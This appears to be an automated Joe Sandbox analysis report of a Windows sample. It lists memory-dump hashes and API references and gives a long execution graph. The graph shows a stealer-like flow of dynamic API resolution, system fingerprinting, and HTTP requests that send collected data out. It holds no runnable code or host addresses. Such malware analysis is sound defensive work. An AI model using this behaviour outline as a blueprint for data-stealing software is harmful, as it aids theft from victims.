                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: DeallocateXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                                                                                    • String ID: map/set too long
                                                                                    • API String ID: 2273164399-558153379
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E5285
                                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 006E52E1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                    • String ID: mEn
                                                                                    • API String ID: 593203224-2555016830
                                                                                    • Opcode ID: 30bdad64a7bb7b829936f74e463f97eade0965408e2336494d4e64cdb900b692
                                                                                    • Instruction ID: 0322f6763c4807743417f910e8c687c1c330c9cffe80d81ea132c0ff495c4b77
                                                                                    • Opcode Fuzzy Hash: 30bdad64a7bb7b829936f74e463f97eade0965408e2336494d4e64cdb900b692
                                                                                    • Instruction Fuzzy Hash: 11019E31601658EFCB04DF59C889E9D77BAEF84764F1401A9E902AB360DF70EE40CB50
                                                                                    APIs
                                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006E166C
                                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006E16A4
                                                                                      • Part of subcall function 006E52EA: _Yarn.LIBCPMT ref: 006E5309
                                                                                      • Part of subcall function 006E52EA: _Yarn.LIBCPMT ref: 006E532D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                    • String ID: bad locale name
                                                                                    • API String ID: 1908188788-1405518554
                                                                                    • Opcode ID: a58cfe1bdf76d9db9e04ffbe85503f1b2fbe6c7ef545aab7c2e05ee70a0cbe1d
                                                                                    • Instruction ID: d7b06c6b6f2b80b6998c9d69ab8c3c53282e16d56052a31f75f240c8d96a5e39
                                                                                    • Opcode Fuzzy Hash: a58cfe1bdf76d9db9e04ffbe85503f1b2fbe6c7ef545aab7c2e05ee70a0cbe1d
                                                                                    • Instruction Fuzzy Hash: C1F01771506B90DE83319F7B8881447FBE4BE29320394CA6EE1DEC3A11D734A544CF6A
                                                                                    APIs
                                                                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,00000FA0,0070A100,00000FA0,00000000,00000000,?,?,00000003,006F23A3), ref: 006F2C02
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CountCriticalInitializeSectionSpin
                                                                                    • String ID: InitializeCriticalSectionEx$mEn
                                                                                    • API String ID: 2593887523-3150776048
                                                                                    • Opcode ID: 6e7e1416b90bf8078a37c737dd98ae4bdeda15b8e1565b82e2ec55972764aa47
                                                                                    • Instruction ID: 11c2efb57993d3c472571cc01b12fedff916b16e0cf8551f561e07b38b38746a
                                                                                    • Opcode Fuzzy Hash: 6e7e1416b90bf8078a37c737dd98ae4bdeda15b8e1565b82e2ec55972764aa47
                                                                                    • Instruction Fuzzy Hash: 5DE06D32680219F7CB116F50DC09E9E3F66DB047A1F008211FE18251A1CA759861DAC4
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1589669493.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1589647583.00000000006E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589687618.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589701895.000000000073C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1589743234.000000000073F000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6e0000_file.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Alloc
                                                                                    • String ID: FlsAlloc$mEn
                                                                                    • API String ID: 2773662609-2397785389
                                                                                    • Opcode ID: 2f40b5f85dfb786146564ef11589ecdb6753dc7b262fb4590317414fbcda0063
                                                                                    • Instruction ID: 74200229f9725872a419c4f433438a755ac5c23b76db9eabad5a8e5a0421ba38
                                                                                    • Opcode Fuzzy Hash: 2f40b5f85dfb786146564ef11589ecdb6753dc7b262fb4590317414fbcda0063
                                                                                    • Instruction Fuzzy Hash: C7E0C23178132DF3C23137A19C1AEFEBE4B8B44BB0B004221FF04212D19EA849008AD9

                                                                                    Execution Graph

                                                                                    Execution Coverage:3.8%
                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                    Signature Coverage:11.2%
                                                                                    Total number of Nodes:2000
                                                                                    Total number of Limit Nodes:40
API calls 95182->95183 95184 40393d 95183->95184 95185 4024d7 9 API calls 95184->95185 95186 40394e 95185->95186 95187 4024d7 9 API calls 95186->95187 95188 40395f 95187->95188 95189 4024d7 9 API calls 95188->95189 95190 403970 95189->95190 95191 4024d7 9 API calls 95190->95191 95192 403981 95191->95192 95193 4024d7 9 API calls 95192->95193 95194 403992 95193->95194 95195 4024d7 9 API calls 95194->95195 95196 4039a3 95195->95196 95197 4024d7 9 API calls 95196->95197 95198 4039b4 95197->95198 95199 4024d7 9 API calls 95198->95199 95200 4039c5 95199->95200 95201 4024d7 9 API calls 95200->95201 95202 4039d6 95201->95202 95203 4024d7 9 API calls 95202->95203 95204 4039e7 95203->95204 95205 4024d7 9 API calls 95204->95205 95206 4039f8 95205->95206 95207 4024d7 9 API calls 95206->95207 95208 403a09 95207->95208 95209 4024d7 9 API calls 95208->95209 95210 403a1a 95209->95210 95211 4024d7 9 API calls 95210->95211 95212 403a2b 95211->95212 95213 4024d7 9 API calls 95212->95213 95214 403a3c 95213->95214 95215 4024d7 9 API calls 95214->95215 95216 403a4d 95215->95216 95217 417645 95216->95217 95218 417652 43 API calls 95217->95218 95219 417a2a 9 API calls 95217->95219 95218->95219 95220 417b39 95219->95220 95221 417acb GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 95219->95221 95222 417b46 8 API calls 95220->95222 95223 417bf9 95220->95223 95221->95220 95222->95223 95224 417c70 95223->95224 95225 417c02 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 95223->95225 95226 417d02 95224->95226 95227 417c7d 6 API calls 95224->95227 95225->95224 95228 417dd9 95226->95228 95229 417d0f 9 API calls 95226->95229 95227->95226 95230 417e50 95228->95230 95231 417de2 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 95228->95231 95229->95228 95232 417e82 95230->95232 95233 417e59 GetProcAddress GetProcAddress 95230->95233 95231->95230 95234 417eb4 95232->95234 95235 417e8b GetProcAddress GetProcAddress 
95232->95235 95233->95232 95236 417ec1 10 API calls 95234->95236 95237 417fa0 95234->95237 95235->95234 95236->95237 95238 418000 95237->95238 95239 417fa9 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 95237->95239 95240 418009 GetProcAddress 95238->95240 95241 41801b 95238->95241 95239->95238 95240->95241 95242 418024 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 95241->95242 95243 41807b 95241->95243 95242->95243 95244 416aac 95243->95244 95245 418084 GetProcAddress 95243->95245 95246 410b5c _EH_prolog 95244->95246 95245->95244 95247 40f923 lstrcpy 95246->95247 95248 410b83 95247->95248 95249 40f923 lstrcpy 95248->95249 95250 410b9a GetSystemTime 95249->95250 95251 410bb8 95250->95251 95251->94459 95253 40fa65 95252->95253 95254 40fa89 95253->95254 95255 40fa77 lstrcpy lstrcat 95253->95255 95254->94468 95255->95254 95257 40f95a lstrcpy 95256->95257 95258 4010cc 95257->95258 95259 40f95a lstrcpy 95258->95259 95260 4010dc 95259->95260 95261 40f95a lstrcpy 95260->95261 95262 4010ec 95261->95262 95263 40f95a lstrcpy 95262->95263 95264 401108 95263->95264 95265 41390c _EH_prolog 95264->95265 95266 4135ac _EH_prolog 95265->95266 95267 413932 95266->95267 95268 40f997 2 API calls 95267->95268 95269 413946 95268->95269 95270 40f997 2 API calls 95269->95270 95271 413953 95270->95271 95272 40f997 2 API calls 95271->95272 95273 413960 95272->95273 95274 40f923 lstrcpy 95273->95274 95275 413970 95274->95275 95276 40f923 lstrcpy 95275->95276 95277 413981 95276->95277 95278 40f923 lstrcpy 95277->95278 95279 413992 95278->95279 95280 40f923 lstrcpy 95279->95280 95281 4139a3 95280->95281 95282 40f923 lstrcpy 95281->95282 95283 4139b4 95282->95283 95284 40f923 lstrcpy 95283->95284 95295 4139c5 95284->95295 95285 4020f9 lstrcpy 95285->95295 95287 40212d lstrcpy 95287->95295 95288 413adc StrCmpCA 95288->95295 95289 413b5d StrCmpCA 95290 41435b 95289->95290 95289->95295 95291 40f9e1 lstrcpy 95290->95291 95292 41436a 95291->95292 96402 40212d 95292->96402 
95295->95285 95295->95287 95295->95288 95295->95289 95297 413d0a StrCmpCA 95295->95297 95301 402147 lstrcpy 95295->95301 95310 413eb7 StrCmpCA 95295->95310 95322 414064 StrCmpCA 95295->95322 95329 413c89 StrCmpCA 95295->95329 95333 402195 lstrcpy 95295->95333 95336 40217b lstrcpy 95295->95336 95339 41420b StrCmpCA 95295->95339 95343 402231 lstrcpy 95295->95343 95345 413118 33 API calls 95295->95345 95347 413e36 StrCmpCA 95295->95347 95348 4010b1 _EH_prolog lstrcpy 95295->95348 95352 4021e3 lstrcpy 95295->95352 95355 4021c9 lstrcpy 95295->95355 95359 40f95a lstrcpy 95295->95359 95360 40f9e1 lstrcpy 95295->95360 95363 413fe3 StrCmpCA 95295->95363 95366 402217 lstrcpy 95295->95366 95367 41303a 28 API calls 95295->95367 95368 414190 StrCmpCA 95295->95368 95369 402265 lstrcpy 95295->95369 96384 402113 95295->96384 96389 402161 lstrcpy 95295->96389 96390 4021af lstrcpy 95295->96390 96391 4021fd lstrcpy 95295->96391 96392 40224b lstrcpy 95295->96392 95296 40f9e1 lstrcpy 95298 414381 95296->95298 95297->95295 95299 414316 95297->95299 96405 402286 lstrcpy 95298->96405 95300 40f9e1 lstrcpy 95299->95300 95302 414325 95300->95302 95301->95295 96400 40217b lstrcpy 95302->96400 95306 414396 95309 40f9e1 lstrcpy 95306->95309 95307 41432e 95308 40f9e1 lstrcpy 95307->95308 95312 41433c 95308->95312 95311 4143a4 95309->95311 95310->95295 95313 4142d1 95310->95313 96406 4132d9 lstrcpy _EH_prolog 95311->96406 96401 4022a0 lstrcpy 95312->96401 95314 40f9e1 lstrcpy 95313->95314 95315 4142e0 95314->95315 96398 4021c9 lstrcpy 95315->96398 95320 4142e9 95323 40f9e1 lstrcpy 95320->95323 95321 414261 95325 40f9e1 lstrcpy 95321->95325 95322->95295 95324 41428f 95322->95324 95326 4142f7 95323->95326 95328 40f9e1 lstrcpy 95324->95328 95327 41426f 95325->95327 96399 4022ba lstrcpy 95326->96399 96395 4132d9 lstrcpy _EH_prolog 95327->96395 95330 41429e 95328->95330 95329->95295 96396 402217 lstrcpy 95330->96396 95333->95295 95335 4142a7 95338 40f9e1 lstrcpy 95335->95338 95336->95295 95340 4142b5 
95338->95340 95341 414226 95339->95341 95342 414216 Sleep 95339->95342 96397 4022d4 lstrcpy 95340->96397 95344 40f9e1 lstrcpy 95341->95344 95342->95295 95343->95295 95346 414235 95344->95346 95345->95295 96393 402265 lstrcpy 95346->96393 95347->95295 95348->95295 95352->95295 95353 41428a 95356 413295 _EH_prolog 95353->95356 95354 41423e 95357 40f9e1 lstrcpy 95354->95357 95355->95295 95361 41441b 95356->95361 95358 41424c 95357->95358 96394 4022ee lstrcpy 95358->96394 95359->95295 95360->95295 96387 401061 _EH_prolog 95361->96387 95363->95295 95364 414427 95370 4136b3 95364->95370 95366->95295 95367->95295 95368->95295 95369->95295 95371 40f9e1 lstrcpy 95370->95371 95372 4136c3 95371->95372 95373 40f9e1 lstrcpy 95372->95373 95374 4136cf 95373->95374 95375 40f9e1 lstrcpy 95374->95375 95376 4136db 95375->95376 95377 413295 _EH_prolog 95376->95377 95378 4132b5 95377->95378 95378->94478 95380 40f971 95379->95380 95381 40f986 95380->95381 95382 40f97e lstrcpy 95380->95382 95381->94485 95382->95381 95383->94495 95385 410516 GetVolumeInformationA 95384->95385 95386 41050f 95384->95386 95387 410546 95385->95387 95386->95385 95388 410578 GetProcessHeap HeapAlloc 95387->95388 95389 41059b wsprintfA lstrcat 95388->95389 95390 41058d 95388->95390 96407 4104a2 GetCurrentHwProfileA 95389->96407 95391 40f923 lstrcpy 95390->95391 95393 410596 95391->95393 95393->94502 95394 4105cb 95395 4105da lstrlenA 95394->95395 95396 4105ee 95395->95396 96411 411154 lstrcpy malloc strncpy 95396->96411 95398 4105f8 95399 410606 lstrcat 95398->95399 95400 410619 95399->95400 95401 40f923 lstrcpy 95400->95401 95402 41062a 95401->95402 95402->95393 95404 40f95a lstrcpy 95403->95404 95405 403b25 95404->95405 96412 403a54 _EH_prolog 95405->96412 95407 403b31 95408 40f923 lstrcpy 95407->95408 95409 403b4e 95408->95409 95410 40f923 lstrcpy 95409->95410 95411 403b61 95410->95411 95412 40f923 lstrcpy 95411->95412 95413 403b72 95412->95413 95414 40f923 lstrcpy 95413->95414 95415 403b83 95414->95415 95416 
40f923 lstrcpy 95415->95416 95417 403b94 95416->95417 95418 403ba4 InternetOpenA StrCmpCA 95417->95418 95419 403bc6 95418->95419 95420 404122 InternetCloseHandle 95419->95420 95421 410b5c 3 API calls 95419->95421 95434 404136 95420->95434 95422 403bdc 95421->95422 95423 40fa28 3 API calls 95422->95423 95424 403bef 95423->95424 95425 40f9e1 lstrcpy 95424->95425 95426 403bfc 95425->95426 95427 40fa9c 4 API calls 95426->95427 95428 403c25 95427->95428 95429 40f9e1 lstrcpy 95428->95429 95430 403c32 95429->95430 95431 40fa9c 4 API calls 95430->95431 95432 403c4f 95431->95432 95433 40f9e1 lstrcpy 95432->95433 95435 403c5c 95433->95435 95434->94505 95436 40fa28 3 API calls 95435->95436 95437 403c78 95436->95437 95438 40f9e1 lstrcpy 95437->95438 95439 403c85 95438->95439 95440 40fa9c 4 API calls 95439->95440 95441 403ca2 95440->95441 95442 40f9e1 lstrcpy 95441->95442 95443 403caf 95442->95443 95444 40fa9c 4 API calls 95443->95444 95445 403ccc 95444->95445 95446 40f9e1 lstrcpy 95445->95446 95447 403cd9 95446->95447 95448 40fa9c 4 API calls 95447->95448 95449 403cf7 95448->95449 95450 40fa28 3 API calls 95449->95450 95451 403d0a 95450->95451 95452 40f9e1 lstrcpy 95451->95452 95453 403d17 95452->95453 95454 403d2f InternetConnectA 95453->95454 95454->95420 95455 403d55 HttpOpenRequestA 95454->95455 95456 404119 InternetCloseHandle 95455->95456 95457 403d8e 95455->95457 95456->95420 95458 403d92 InternetSetOptionA 95457->95458 95459 403da8 95457->95459 95458->95459 95460 40fa9c 4 API calls 95459->95460 95461 403db9 95460->95461 95462 40f9e1 lstrcpy 95461->95462 95463 403dc6 95462->95463 95464 40fa28 3 API calls 95463->95464 95465 403de2 95464->95465 95466 40f9e1 lstrcpy 95465->95466 95467 403def 95466->95467 95468 40fa9c 4 API calls 95467->95468 95469 403e0c 95468->95469 95470 40f9e1 lstrcpy 95469->95470 95471 403e19 95470->95471 95472 40fa9c 4 API calls 95471->95472 95473 403e37 95472->95473 95474 40f9e1 lstrcpy 95473->95474 95475 403e44 95474->95475 95476 40fa9c 4 API calls 
95475->95476 95477 403e61 95476->95477 95478 40f9e1 lstrcpy 95477->95478 95479 403e6e 95478->95479 95480 40fa9c 4 API calls 95479->95480 95481 403e8b 95480->95481 95482 40f9e1 lstrcpy 95481->95482 95483 403e98 95482->95483 95484 40fa28 3 API calls 95483->95484 95485 403eb4 95484->95485 95486 40f9e1 lstrcpy 95485->95486 95487 403ec1 95486->95487 95488 40fa9c 4 API calls 95487->95488 95489 403ede 95488->95489 95490 40f9e1 lstrcpy 95489->95490 95491 403eeb 95490->95491 95492 40fa9c 4 API calls 95491->95492 95493 403f08 95492->95493 95494 40f9e1 lstrcpy 95493->95494 95495 403f15 95494->95495 95496 40fa28 3 API calls 95495->95496 95497 403f31 95496->95497 95498 40f9e1 lstrcpy 95497->95498 95499 403f3e 95498->95499 95500 40fa9c 4 API calls 95499->95500 95501 403f5b 95500->95501 95502 40f9e1 lstrcpy 95501->95502 95503 403f68 95502->95503 95504 40fa9c 4 API calls 95503->95504 95505 403f86 95504->95505 95506 40f9e1 lstrcpy 95505->95506 95507 403f93 95506->95507 95508 40fa9c 4 API calls 95507->95508 95509 403fb0 95508->95509 95510 40f9e1 lstrcpy 95509->95510 95511 403fbd 95510->95511 95512 40fa9c 4 API calls 95511->95512 95513 403fda 95512->95513 95514 40f9e1 lstrcpy 95513->95514 95515 403fe7 95514->95515 95516 40fa28 3 API calls 95515->95516 95517 404003 95516->95517 95518 40f9e1 lstrcpy 95517->95518 95519 404010 95518->95519 95520 40f923 lstrcpy 95519->95520 95521 404029 95520->95521 95522 40fa28 3 API calls 95521->95522 95523 40403d 95522->95523 95524 40fa28 3 API calls 95523->95524 95525 404050 95524->95525 95526 40f9e1 lstrcpy 95525->95526 95527 40405d 95526->95527 95528 40407d lstrlenA 95527->95528 95529 40408d 95528->95529 95530 404096 lstrlenA 95529->95530 96420 40fb4d 95530->96420 95532 4040a6 HttpSendRequestA 95533 4040ef InternetReadFile 95532->95533 95534 404106 InternetCloseHandle 95533->95534 95537 4040b5 95533->95537 96421 40f98e 95534->96421 95536 40fa9c 4 API calls 95536->95537 95537->95533 95537->95534 95537->95536 95538 40f9e1 lstrcpy 95537->95538 
95538->95537 96425 40fb4d 95539->96425 95541 411cfe StrCmpCA 95542 411d10 95541->95542 95543 411d09 ExitProcess 95541->95543 95544 411d20 strtok_s 95542->95544 95545 411e6d 95544->95545 95558 411d31 95544->95558 95545->94507 95546 411e52 strtok_s 95546->95545 95546->95558 95547 411d81 StrCmpCA 95547->95546 95547->95558 95548 411df1 StrCmpCA 95548->95546 95548->95558 95549 411d65 StrCmpCA 95549->95546 95549->95558 95550 411dc7 StrCmpCA 95550->95546 95550->95558 95551 411e06 StrCmpCA 95551->95546 95552 411d49 StrCmpCA 95552->95546 95552->95558 95553 411d9d StrCmpCA 95553->95546 95553->95558 95554 411ddc StrCmpCA 95554->95546 95554->95558 95555 411e1c StrCmpCA 95555->95546 95556 411e3e StrCmpCA 95556->95546 95557 40f997 2 API calls 95557->95558 95558->95546 95558->95547 95558->95548 95558->95549 95558->95550 95558->95551 95558->95552 95558->95553 95558->95554 95558->95555 95558->95556 95558->95557 95560 40f95a lstrcpy 95559->95560 95561 40517c 95560->95561 95562 403a54 6 API calls 95561->95562 95563 405188 95562->95563 95564 40f923 lstrcpy 95563->95564 95565 4051a5 95564->95565 95566 40f923 lstrcpy 95565->95566 95567 4051b8 95566->95567 95568 40f923 lstrcpy 95567->95568 95569 4051c9 95568->95569 95570 40f923 lstrcpy 95569->95570 95571 4051da 95570->95571 95572 40f923 lstrcpy 95571->95572 95573 4051eb 95572->95573 95574 4051fb InternetOpenA StrCmpCA 95573->95574 95575 40521d 95574->95575 95576 4058d8 InternetCloseHandle 95575->95576 95578 410b5c 3 API calls 95575->95578 95577 4058f3 95576->95577 96432 406242 CryptStringToBinaryA 95577->96432 95579 405233 95578->95579 95581 40fa28 3 API calls 95579->95581 95583 405246 95581->95583 95584 40f9e1 lstrcpy 95583->95584 95586 405253 95584->95586 95585 40f997 2 API calls 95587 40590c 95585->95587 95592 40fa9c 4 API calls 95586->95592 95588 40fa9c 4 API calls 95587->95588 95589 40591a 95588->95589 95590 40f9e1 lstrcpy 95589->95590 95591 405926 95590->95591 95598 401061 _EH_prolog 95591->95598 95593 40527c 95592->95593 95594 
40f9e1 lstrcpy 95593->95594 95595 405289 95594->95595 95596 40fa9c 4 API calls 95595->95596 95597 4052a6 95596->95597 95599 40f9e1 lstrcpy 95597->95599 95600 405984 95598->95600 95601 4052b3 95599->95601 95600->94513 95602 40fa28 3 API calls 95601->95602 95603 4052cf 95602->95603 95604 40f9e1 lstrcpy 95603->95604 95605 4052dc 95604->95605 95606 40fa9c 4 API calls 95605->95606 95607 4052f9 95606->95607 95608 40f9e1 lstrcpy 95607->95608 95609 405306 95608->95609 95610 40fa9c 4 API calls 95609->95610 95611 405323 95610->95611 95612 40f9e1 lstrcpy 95611->95612 95613 405330 95612->95613 95614 40fa9c 4 API calls 95613->95614 95615 40534e 95614->95615 95616 40fa28 3 API calls 95615->95616 95617 405361 95616->95617 95618 40f9e1 lstrcpy 95617->95618 95619 40536e 95618->95619 95620 405386 InternetConnectA 95619->95620 95620->95576 95621 4053ac HttpOpenRequestA 95620->95621 95622 4053e3 95621->95622 95623 4058cf InternetCloseHandle 95621->95623 95624 4053e7 InternetSetOptionA 95622->95624 95625 4053fd 95622->95625 95623->95576 95624->95625 95626 40fa9c 4 API calls 95625->95626 95627 40540e 95626->95627 95628 40f9e1 lstrcpy 95627->95628 95629 40541b 95628->95629 95630 40fa28 3 API calls 95629->95630 95631 405437 95630->95631 95632 40f9e1 lstrcpy 95631->95632 95633 405444 95632->95633 95634 40fa9c 4 API calls 95633->95634 95635 405461 95634->95635 95636 40f9e1 lstrcpy 95635->95636 95637 40546e 95636->95637 95638 40fa9c 4 API calls 95637->95638 95639 40548c 95638->95639 95640 40f9e1 lstrcpy 95639->95640 95641 405499 95640->95641 95642 40fa9c 4 API calls 95641->95642 95643 4054b7 95642->95643 95644 40f9e1 lstrcpy 95643->95644 95645 4054c4 95644->95645 95646 40fa9c 4 API calls 95645->95646 95647 4054e1 95646->95647 95648 40f9e1 lstrcpy 95647->95648 95649 4054ee 95648->95649 95650 40fa28 3 API calls 95649->95650 95651 40550a 95650->95651 95652 40f9e1 lstrcpy 95651->95652 95653 405517 95652->95653 95654 40fa9c 4 API calls 95653->95654 95655 405534 95654->95655 95656 40f9e1 lstrcpy 
95655->95656 95657 405541 95656->95657 95658 40fa9c 4 API calls 95657->95658 95659 40555e 95658->95659 95660 40f9e1 lstrcpy 95659->95660 95661 40556b 95660->95661 95662 40fa28 3 API calls 95661->95662 95663 405587 95662->95663 95664 40f9e1 lstrcpy 95663->95664 95665 405594 95664->95665 95666 40fa9c 4 API calls 95665->95666 95667 4055b1 95666->95667 95668 40f9e1 lstrcpy 95667->95668 95669 4055be 95668->95669 95670 40fa9c 4 API calls 95669->95670 95671 4055dc 95670->95671 95672 40f9e1 lstrcpy 95671->95672 95673 4055e9 95672->95673 95674 40fa9c 4 API calls 95673->95674 95675 405606 95674->95675 95676 40f9e1 lstrcpy 95675->95676 95677 405613 95676->95677 95678 40fa9c 4 API calls 95677->95678 95679 405630 95678->95679 95680 40f9e1 lstrcpy 95679->95680 95681 40563d 95680->95681 95682 40fa9c 4 API calls 95681->95682 95683 40565b 95682->95683 95684 40f9e1 lstrcpy 95683->95684 95685 405668 95684->95685 95686 40fa9c 4 API calls 95685->95686 95687 405685 95686->95687 95688 40f9e1 lstrcpy 95687->95688 95689 405692 95688->95689 95690 40fa9c 4 API calls 95689->95690 95691 4056af 95690->95691 95692 40f9e1 lstrcpy 95691->95692 95693 4056bc 95692->95693 95694 40fa28 3 API calls 95693->95694 95695 4056d8 95694->95695 95696 40f9e1 lstrcpy 95695->95696 95697 4056e5 95696->95697 95698 40fa9c 4 API calls 95697->95698 95699 405702 95698->95699 95700 40f9e1 lstrcpy 95699->95700 95701 40570f 95700->95701 95702 40fa9c 4 API calls 95701->95702 95703 40572d 95702->95703 95704 40f9e1 lstrcpy 95703->95704 95705 40573a 95704->95705 95706 40fa9c 4 API calls 95705->95706 95707 405757 95706->95707 95708 40f9e1 lstrcpy 95707->95708 95709 405764 95708->95709 95710 40fa9c 4 API calls 95709->95710 95711 405781 95710->95711 95712 40f9e1 lstrcpy 95711->95712 95713 40578e 95712->95713 95714 40fa28 3 API calls 95713->95714 95715 4057aa 95714->95715 95716 40f9e1 lstrcpy 95715->95716 95717 4057b7 95716->95717 95718 4057cb lstrlenA 95717->95718 96426 40fb4d 95718->96426 95720 4057dc lstrlenA GetProcessHeap 
HeapAlloc 96427 40fb4d 95720->96427 95722 4057fe lstrlenA 96428 40fb4d 95722->96428 95724 40580e memcpy 96429 40fb4d 95724->96429 95726 405820 lstrlenA 95727 405830 95726->95727 95728 405839 lstrlenA memcpy 95727->95728 96430 40fb4d 95728->96430 95730 405855 lstrlenA 96431 40fb4d 95730->96431 95732 405865 HttpSendRequestA 95733 4058b1 InternetReadFile 95732->95733 95734 4058c8 InternetCloseHandle 95733->95734 95736 405877 95733->95736 95734->95623 95735 40fa9c 4 API calls 95735->95736 95736->95733 95736->95734 95736->95735 95737 40f9e1 lstrcpy 95736->95737 95737->95736 96437 40fb4d 95738->96437 95740 411740 strtok_s 95741 4117a9 95740->95741 95742 41174d 95740->95742 95741->94515 95743 411792 strtok_s 95742->95743 95744 40f997 2 API calls 95742->95744 95745 40f997 2 API calls 95742->95745 95743->95741 95743->95742 95744->95743 95745->95742 96438 40fb4d 95746->96438 95748 41151d strtok_s 95749 41162e 95748->95749 95751 41152e 95748->95751 95749->94523 95750 4115df StrCmpCA 95750->95751 95751->95750 95752 40f997 2 API calls 95751->95752 95753 411611 strtok_s 95751->95753 95754 4115ae StrCmpCA 95751->95754 95755 411589 StrCmpCA 95751->95755 95756 41155b StrCmpCA 95751->95756 95752->95753 95753->95749 95753->95751 95754->95751 95755->95751 95756->95751 96439 40fb4d 95757->96439 95759 411674 strtok_s 95760 4116fa 95759->95760 95762 411681 95759->95762 95760->94531 95761 40f997 2 API calls 95764 4116e3 strtok_s 95761->95764 95762->95761 95763 4116ab StrCmpCA 95762->95763 95762->95764 95765 40f997 2 API calls 95762->95765 95763->95762 95764->95760 95764->95762 95765->95762 95767 40f923 lstrcpy 95766->95767 95768 414625 95767->95768 95769 40fa9c 4 API calls 95768->95769 95770 41463a 95769->95770 95771 40f9e1 lstrcpy 95770->95771 95772 414647 95771->95772 95773 40fa9c 4 API calls 95772->95773 95774 414665 95773->95774 95775 40f9e1 lstrcpy 95774->95775 95776 414672 95775->95776 95777 40fa9c 4 API calls 95776->95777 95778 41468f 95777->95778 95779 40f9e1 lstrcpy 95778->95779 
